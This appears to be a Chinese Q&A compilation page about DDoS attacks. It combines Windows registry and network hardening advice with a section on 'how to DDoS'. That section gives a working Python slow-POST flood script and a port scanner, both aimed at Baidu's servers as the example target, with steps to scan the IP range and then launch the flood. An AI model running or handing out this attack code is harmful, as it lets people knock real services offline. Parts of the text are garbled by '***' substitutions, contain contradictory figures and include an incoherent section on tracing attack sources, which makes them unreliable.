ddos攻击频率_ddos负荷攻击原版

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DDOS攻击 如何进行DDOS攻击

针对目前各大传奇私服站长受到盛大或者某些卑鄙小人的 *** 行为,我特地整理了防止DDOS的攻击资料!

绝对可以防止针对传奇端口,或者WEB的大流量的DDOS承受大约40万个包的攻击量

设置保护80.7000.7100.7200等你的传奇端口的。

然后按下面整理的注册表修改或者添加下面的数值。

请注意,以下的安全设置均通过注册表进行修改,该设置的性能取决于服务器的配置,尤其是CPU的处理能力。如按照如下进行安全设置,采用双路至强2.4G的服务器配置,经过测试,可承受大约1万个包的攻击量。

接下来你就可以高枕无忧了。

一部份DDOS我们可以通过DOS命令netstat -an|more或者 *** 综合分析软件:sniff等查到相关攻击手法、如攻击某个主要端口、或者对方主要来自哪个端口、对方IP等。这样我们可以利用w2k自带的远程访问与路由或者IP策略等本身自带的工具解决掉这些攻击。做为无法利用这些查到相关数据的我们也可以尝试一下通过对服务器进行安全设置来防范DDOS攻击。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]

'关闭无效网关的检查。当服务器设置了多个网关,这样在 *** 不通畅的时候系统会尝试连接

'第二个网关,通过关闭它可以优化 *** 。

"EnableDeadGWDetect"=dword:00000000

'禁止响应ICMP重定向报文。此类报文有可能用以攻击,所以系统应该拒绝接受ICMP重定向报文。

"EnableICMPRedirects"=dword:00000000

'不允许释放NETBIOS名。当攻击者发出查询服务器NETBIOS名的请求时,可以使服务器禁止响应。

'注意系统必须安装SP2以上

"NonameReleaseOnDemand"=dword:00000001

'发送验证保持活动数据包。该选项决定TCP间隔多少时间来确定当前连接还处于连接状态,

'不设该值,则系统每隔2小时对TCP是否有闲置连接进行检查,这里设置时间为5分钟。

"KeepAliveTime"=dword:000493e0

'禁止进行更大包长度路径检测。该项值为1时,将自动检测出可以传输的数据包的大小,

'可以用来提高传输效率,如出现故障或安全起见,设项值为0,表示使用固定MTU值576bytes。

"EnablePMTUDiscovery"=dword:00000000

'启动syn攻击保护。缺省项值为0,表示不开启攻击保护,项值为1和2表示启动syn攻击保护,设成2之后

'安全级别更高,对何种状况下认为是攻击,则需要根据下面的TcpMaxHalfOpen和TcpMaxHalfOpenRetried值

'设定的条件来触发启动了。这里需要注意的是,NT4.0必须设为1,设为2后在某种特殊数据包下会导致系统重启。

"SynAttackProtect"=dword:00000002

'同时允许打开的半连接数量。所谓半连接,表示未完整建立的TCP会话,用netstat命令可以看到呈SYN_RCVD状态

'的就是。这里使用微软建议值,服务器设为100,高级服务器设为500。建议可以设稍微小一点。

"TcpMaxHalfOpen"=dword:00000064

'判断是否存在攻击的触发点。这里使用微软建议值,服务器为80,高级服务器为400。

"TcpMaxHalfOpenRetried"=dword:00000050

'设置等待SYN-ACK时间。缺省项值为3,缺省这一过程消耗时间45秒。项值为2,消耗时间为21秒。

'项值为1,消耗时间为9秒。更低可以设为0,表示不等待,消耗时间为3秒。这个值可以根据遭受攻击规模修改。

'微软站点安全推荐为2。

"TcpMaxConnectResponseRetran *** issions"=dword:00000001

'设置TCP重传单个数据段的次数。缺省项值为5,缺省这一过程消耗时间240秒。微软站点安全推荐为3。

"TcpMaxDataRetran *** issions"=dword:00000003

'设置syn攻击保护的临界点。当可用的backlog变为0时,此参数用于控制syn攻击保护的开启,微软站点安全推荐为5。

"TCPMaxPortsExhausted"=dword:00000005

'禁止IP源路由。缺省项值为1,表示不转发源路由包,项值设为0,表示全部转发,设置为2,表示丢弃所有接受的

'源路由包,微软站点安全推荐为2。

"DisableIPSourceRouting"=dword:0000002

'限制处于TIME_WAIT状态的最长时间。缺省为240秒,更低为30秒,更高为300秒。建议设为30秒。

"TcpTimedWaitDelay"=dword:0000001e

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Net *** \Parameters]

'增大Net *** 的连接块增加幅度。缺省为3,范围1-20,数值越大在连接越多时提升性能。每个连接块消耗87个字节。

"BacklogIncrement"=dword:00000003

'更大Net *** 的连接快的数目。范围1-40000,这里设置为1000,数值越大在连接越多时允许更多连接。

"MaxConnBackLog"=dword:000003e8

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Afd\Parameters]

'配置激活动态Backlog。对于 *** 繁忙或者易遭受SYN攻击的系统,建议设置为1,表示允许动态Backlog。

"EnableDynamicBacklog"=dword:00000001

'配置最小动态Backlog。默认项值为0,表示动态Backlog分配的自由连接的最小数目。当自由连接数目

'低于此数目时,将自动的分配自由连接。默认值为0,对于 *** 繁忙或者易遭受SYN攻击的系统,建议设置为20。

"MinimumDynamicBacklog"=dword:00000014

'更大动态Backlog。表示定义更大"准"连接的数目,主要看内存大小,理论每32M内存更大可以

'增加5000个,这里设为20000。

"MaximumDynamicBacklog"=dword:00002e20

'每次增加的自由连接数据。默认项值为5,表示定义每次增加的自由连接数目。对于 *** 繁忙或者易遭受SYN攻击

'的系统,建议设置为10。

"DynamicBacklogGrowthDelta"=dword:0000000a

以下部分需要根据实际情况手动修改

'-------------------------------------------------------------------------------------------------

'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]

'启用网卡上的安全过滤

'"EnableSecurityFilters"=dword:00000001

'

'同时打开的TCP连接数,这里可以根据情况进行控制。

'"TcpNumConnections"=

'

'该参数控制 TCP 报头表的大小限制。在有大量 RAM 的机器上,增加该设置可以提高 SYN 攻击期间的响应性能。

'"TcpMaxSendFree"=

'

'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{自己的网卡接口}]

'禁止路由发现功能。ICMP路由通告报文可以被用来增加路由表纪录,可以导致攻击,所以禁止路由发现。

"PerformRouterDiscovery "=dword:00000000

网站服务器被DDoS攻击会怎么样 如何防范DDoS攻击

想要知道被DDOS攻击的后果至少要知道原理。DDOS也就是分布式拒绝服务攻击,简单说通过大量虚假或者无用信息来发送到服务器使其承受不必要的负荷,导致其因为信息风暴而崩溃,具体的表现因服务器本身的访问量或者攻击强度而异。防范这类攻击最简单的就是用相应的防范措施,常见的有讯云、阿里云等,收费软件。免费软件的话可以参考ddos deflate

网站被ddos攻击之后,怎么查ddos攻击源

怎么查ddos攻击源,一旦网站出现攻击之时,能够随时根据ddos攻击相关信息以及相关路径,发动进攻位置,ddos攻击源主要是针对定位要求,不能准确的定位,因为不少攻击源地址都是随机出现的,根据ddos攻击机构,寻找攻击的难度还是挺大的,分辨好位置之后,再发动攻击才是最重要的。

Ddos追踪主要有两个目的,首先是利用追踪源出动攻击,利用攻击特征针对流量过滤,来对ddos寻求帮助。另外在寻找到攻击源之后,收集被攻击的证据,从而利用法律的手段来对攻击进行惩罚,不管最后是不是能够找到攻击源,ddos攻击源的对象针对防御系统都是极为重要的。目前最重要的是ddos追踪技术,利用这种追踪技术,在实际角度出发开始对ddos攻击进行协助服务。

怎么查ddos攻击源,还可以利用观察路由器的方式来准确的寻找出ddos攻击源路径在哪里。当网站受到ddos攻击之时,可以在主机受到路由器控制的时候,这些数据会对电脑发动数据包攻击,因此加大了数据丢失的可能性。

在ddos遭受到攻击之后,攻击器的设计就会精密不少,而且寻找到真正的攻击者才是最明智的。比如攻击者利用的是傀儡机进行的攻击。就很难利用追踪技术来寻找攻击源了。所以大家需要充分的掌握ddos攻击源查询 *** ,才能保证网站不被攻击。

希望可以帮到您,谢谢!

如何进行DDOS攻击怎么做

会Python吗?下一个Python3.7.0-3.7.3,把代码复制下,粘贴即可

代码:

import socket

import time

import threading

#Pressure Test,ddos tool

#---------------------------

MAX_CONN=20000

PORT=80

HOST="baidu.com"#在双引号里输入对方IP或域名,要保证他联网了或开机了,这里拿百度做示范(别运行!不然后果自负!!)

PAGE="/index.php"

#---------------------------

buf=("POST %s HTTP/1.1\r\n"

"Host: %s\r\n"

"Content-Length: 10000000\r\n"

"Cookie: dklkt_dos_test\r\n"

"\r\n" % (PAGE,HOST))

socks=[]

def conn_thread():

  global socks

  for i in range(0,MAX_CONN):

      s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

      try:

          s.connect((HOST,PORT))

          s.send(buf.encode())

          print ("Send buf OK!,conn=%d\n"%i)

          socks.append(s)

      except Exception as ex:

          print ("Could not connect to server or send error:%s"%ex)

          time.sleep(10)

#end def

def send_thread():

  global socks

  while True:

      for s in socks:

          try:

              s.send("f".encode())

              #print "send OK!"

          except Exception as ex:

              print ("Send Exception:%s\n"%ex)

              socks.remove(s)

              s.close()

      time.sleep(1)

#end def

conn_th=threading.Thread(target=conn_thread,args=())

send_th=threading.Thread(target=send_thread,args=())

conn_th.start()

send_th.start()

如果你要攻击网站,以上代码虽然可行,但是,攻击效果很不好。

所以,更好用Windows里的PING进行检测

操作:

在Windows搜索栏里输入:cmd

输入:

ping -n 10 -l 1 baidu.com

//这里拿百度做示范,别真打百度!

那么,就会发现,系统反映了:

正在 Ping baidu.com [39.156.69.79] 具有 1 字节的数据:

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=29ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

39.156.69.79 的 Ping 统计信息:

  数据包: 已发送 = 10,已接收 = 10,丢失 = 0 (0% 丢失),

往返行程的估计时间(以毫秒为单位):

  最短 = 26ms,最长 = 29ms,平均 = 27ms

说明,百度的服务器有一个主服务器是39.156.69.79

那么,就来查找百度的所有服务器吧!

输入以下代码:

#绝大多数成功的 *** 攻击都是以端口扫描开始的,在 *** 安全和黑客领域,端口扫描是经常用到的技术,可以探测指定主机上是否

#开放了指定端口,进一步判断主机是否运行了某些重要的 *** 服务,最终判断是否存在潜在的安全漏洞,从一定意义上将也属于系统运维的范畴

#端口扫描器程序:模拟端口扫描器的工作原理,并采用多进程技术提高扫描速度

import socket

import sys

import multiprocessing

import time as t

def ports(ports_serve):

  #获取常用端口对应的服务名称

  for port in list(range(1,100))+[143,145,113,443,445,3389,8080]:

      try:

          ports_serve[port]=socket.getservbyport(port)

      except socket.error:

          pass

def ports_scan(host,ports_service):

  ports_open=[]

  try:

      sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

      #超时时间的不同会影响扫描结果的精确度

      socket.timeout(0.01)

  except socket.error:

      print('socket creation error')

      sys.exit()

  for port in ports_service:

      try:

          #尝试连接指定端口

          sock.connect((host,port))

          #记录打开的端口

          ports_open.append(port)

          sock.close()

      except socket.error:

          pass

  return ports_open

if __name__ == '__main__':

  m=multiprocessing.Manager()

  ports_service=dict()

  results=dict()

  ports(ports_service)

  #创建进程池,允许最多8个进程同时运行

  pool = multiprocessing.Pool(processes=8)

  net = '39.156.69.'#后面的IP少一个,因为要扫描这段区域内的IP,从而进行攻击

  for host_number in map(str,range(8,10)):

      host = net + host_number

      #创建一个新进程,同时记录其运行结果

      results[host] = pool.apply_async(ports_scan,(host,ports_service))

      print('starting '+host+'...')

  #关闭进程池,close()必须在join()之前调用

  pool.close()

  #等待进程池中的进程全部执行结束

  pool.join()

  #打印输出结果

  for host in results:

      print('='*30)

      print(host,'.'*10)

      for port in results[host].get():

          print(port,':',ports_service[port])

       

你会发现,Python反映了:

starting 39.156.69.8...

starting 39.156.69.9...

//并不是指百度只有这两个服务器!而是我们目前只能扫描到两个!

接着,运行DDoS攻击程序,把IP分别改为39.156.69.8和39.156.69.9

就可以实现DDoS攻击了。

//注:请不要用于违法用途,并且不要随意进行攻击。如想使用,可攻击虚拟机,但不要攻击外网IP和域名!!!

ddos攻击主控端单台?多台?

一般来说,DDOS攻击是由多台机器进行的,单台机器的攻击能力有限,所以一般情况下,DDOS攻击控制端是多台机器。

被DDoS攻击时的现象?

被DoS攻击时的现象大致有:

* 被攻击主机上有大量等待的TCP连接;

* 被攻击主机的系统资源被大量占用,造成系统停顿;

* *** 中充斥着大量的无用的数据包,源地址为假地址;

* 高流量无用数据使得 *** 拥塞,受害主机无法正常与外界通讯;

* 利用受害主机提供的服务或传输协议上的缺陷,反复高速地发出特定的服务请求,使受害主机无法及时处理所有正常请求;

* 严重时会造成系统死机。

到目前为止,防范DoS特别是DDoS攻击仍比较困难,但仍然可以采取一些措施以降低其产生的危害。对于中小型网站来说,可以从以下几个方面进行防范:

主机设置:

即加固操作系统,对各种操作系统参数进行设置以加强系统的稳固性。重新编译或设置Linux以及各种BSD系统、Solaris和Windows等操作系统内核中的某些参数,可在一定程度上提高系统的抗攻击能力。

例如,对于DoS攻击的典型种类—SYN Flood,它利用TCP/IP协议漏洞发送大量伪造的TCP连接请求,以造成 *** 无法连接用户服务或使操作系统瘫痪。该攻击过程涉及到系统的一些参数:可等待的数据包的链接数和超时等待数据包的时间长度。因此,可进行如下设置:

* 关闭不必要的服务;

* 将数据包的连接数从缺省值128或512修改为2048或更大,以加长每次处理数据包队列的长度,以缓解和消化更多数据包的连接;

* 将连接超时时间设置得较短,以保证正常数据包的连接,屏蔽非法攻击包;

* 及时更新系统、安装补丁。

防火墙设置:

仍以SYN Flood为例,可在防火墙上进行如下设置:

* 禁止对主机非开放服务的访问;

* 限制同时打开的数据包更大连接数;

* 限制特定IP地址的访问;

* 启用防火墙的防DDoS的属性;

* 严格限制对外开放的服务器的向外访问,以防止自己的服务器被当做工具攻击他人。

此外,还可以采取如下 *** :

* Random Drop算法。当流量达到一定的阀值时,按照算法规则丢弃后续报文,以保持主机的处理能力。其不足是会误丢正常的数据包,特别是在大流量数据包的攻击下,正常数据包犹如九牛一毛,容易随非法数据包被拒之网外;

* SYN Cookie算法,采用6次握手技术以降低受攻击率。其不足是依据列表查询,当数据流量增大时,列表急剧膨胀,计算量随之提升,容易造成响应延迟乃至系统瘫痪。

由于DoS攻击种类较多,而防火墙只能抵挡有限的几种。

路由器设置:

以Cisco路由器为例,可采取如下 *** :

* Cisco EXPress Forwarding(CEF);

* 使用Unicast reverse-path;

* 访问控制列表(ACL)过滤;

* 设置数据包流量速率;

* 升级版本过低的IOS;

* 为路由器建立log server。

其中,使用CEF和Unicast设置时要特别注意,使用不当会造成路由器工作效率严重下降。升级IOS也应谨慎。

路由器是 *** 的核心设备,需要慎重设置,更好修改后,先不保存,以观成效。Cisco路由器有两种配置,startup config和running config,修改的时候改变的是running config,可以让这个配置先运行一段时间,认为可行后再保存配置到startup config;如果不满意想恢复到原来的配置,用copy start run即可。

不论防火墙还是路由器都是到外界的接口设备,在进行防DDoS设置的同时,要权衡可能相应牺牲的正常业务的代价,谨慎行事。

利用负载均衡技术:

就是把应用业务分布到几台不同的服务器上,甚至不同的地点。采用循环DNS服务或者硬件路由器技术,将进入系统的请求分流到多台服务器上。这种 *** 要求投资比较大,相应的维护费用也高,中型网站如果有条件可以考虑。

以上 *** 对流量小、针对性强、结构简单的DoS攻击进行防范还是很有效的。而对于DDoS攻击,则需要能够应对大流量的防范措施和技术,需要能够综合多种算法、集多种 *** 设备功能的集成技术。

近年来,国内外也出现了一些运用此类集成技术的产品,如Captus IPS 4000、Mazu Enforcer、Top Layer Attack Mitigator以及国内的绿盟黑洞、东方龙马终结者等,能够有效地抵挡SYN Flood、UDP Flood、ICMP Flood和Stream Flood等大流量DDoS的攻击,个别还具有路由和交换的 *** 功能。对于有能力的网站来说,直接采用这些产品是防范DDoS攻击较为便利的 *** 。但不论国外还是国内的产品,其技术应用的可靠性、可用性等仍有待于进一步提高,如提高设备自身的高可用性、处理速率和效率以及功能的集成性等。

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